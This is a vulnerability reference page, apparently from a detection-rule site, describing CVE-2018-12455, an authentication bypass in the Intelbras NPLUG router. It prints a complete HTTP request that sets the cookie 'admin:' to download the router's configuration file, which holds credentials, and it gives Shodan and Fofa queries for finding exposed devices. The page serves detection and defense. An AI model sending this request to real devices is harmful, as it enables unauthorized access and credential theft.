🔙 목록으로 돌아가기

CVE-2018-12455: Intelbras NPLUG 1.0.0.14 - Authentication Bypass

TitleIntelbras NPLUG 1.0.0.14 - Authentication Bypass
Authorritikchaddha
SeverityCritical
ImpactUnauthenticated attackers can bypass authentication and download the router configuration file containing credentials, network settings, and sensitive information.
RemediationUpdate the device firmware to the latest version.
CVSS Score8.1
EPSS Score0.24004
CVE IDCVE-2018-12455
CWE IDCWE-287
Shodan Queryhtml:"NPLUG"
Fofa Querytitle="NPLUG"
Tags cve cve2018 intelbras auth-bypass iot vuln

🔍 Vulnerability Description

Intelbras NPLUG 1.0.0.14 is vulnerable to authentication bypass through cookie manipulation. An attacker can bypass authentication by simply setting a cookie named “admin:”.

🌐 HTTP Request

GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Cookie: admin:
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-12455.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-12455.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A